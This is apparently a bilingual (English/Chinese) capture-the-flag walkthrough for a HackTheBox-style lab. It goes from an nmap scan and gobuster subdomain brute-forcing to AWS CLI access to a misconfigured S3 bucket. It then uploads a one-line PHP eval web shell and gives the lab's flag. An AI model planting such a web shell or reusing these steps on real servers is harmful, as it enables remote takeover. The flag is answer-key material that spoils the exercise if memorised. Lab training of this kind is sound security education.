Task 1
How many TCP ports are open?
(打开了多少个 TCP 端口?)
sudo nmap -sS -Pn <IP> --min-rate 1000
2
Task 2
What is the domain of the email address provided in the “Contact” section of the website?
(网站“联系方式”部分中提供的电子邮件地址的域名是什么?)
thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
(在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?)
/etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
(进一步枚举时发现了哪个子域?)
这里的意思,可能就是想让你将thetoppers.htb解析到靶机ip取爆破子域名
# echo "<靶机IP> thetoppers.htb">>/etc/hosts
-word.txt-
s1
s2
s3
s4
s5
admin
login
实际通过以下命令是可以爆破出子域名s3的
$ gobuster vhost -u http://thetoppers.htb -w ./word.txt -t 120
在/etc/hosts添加如下s3的子域名
s3.thetoppers.htb
Task 5
Which service is running on the discovered sub-domain?
(哪个服务正在发现的子域上运行?)
Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
(哪个命令行实用程序可用于与在发现的子域上运行的服务进行交互?)
awscli
Task 7
Which command is used to set up the AWS CLI installation?
(使用哪个命令来设置 AWS CLI 安装?)
安装存储库
$ ./python -m awscli configure
aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
(上述实用程序使用什么命令来列出所有 S3 存储桶?)
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls
aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
(该服务器配置为运行用哪种 Web 脚本语言编写的文件?)
列出可用存储桶中的对象
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
php
Flag
-shell.php-
<?php eval($_GET["cmd"]);?>
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 cp /home/martin/shell/shell.php s3://thetoppers.htb
上传文件成功
a980d99281a28d638ac68b9bf9453c2b
Question
- 为什么攻击者配置aws configure可以直接访问桶?
目标 S3 存储桶的访问控制策略允许了对这些任意凭据的访问权限,导致攻击者可随时添加访问桶
- 攻击路线
攻击者爆破子域名发现用的是Amazon s3存储->找到根节点s3.thetoppers.htb->攻击者创建凭据->(根节点服务端未作防护)攻击者查看,上传内容->控制服务器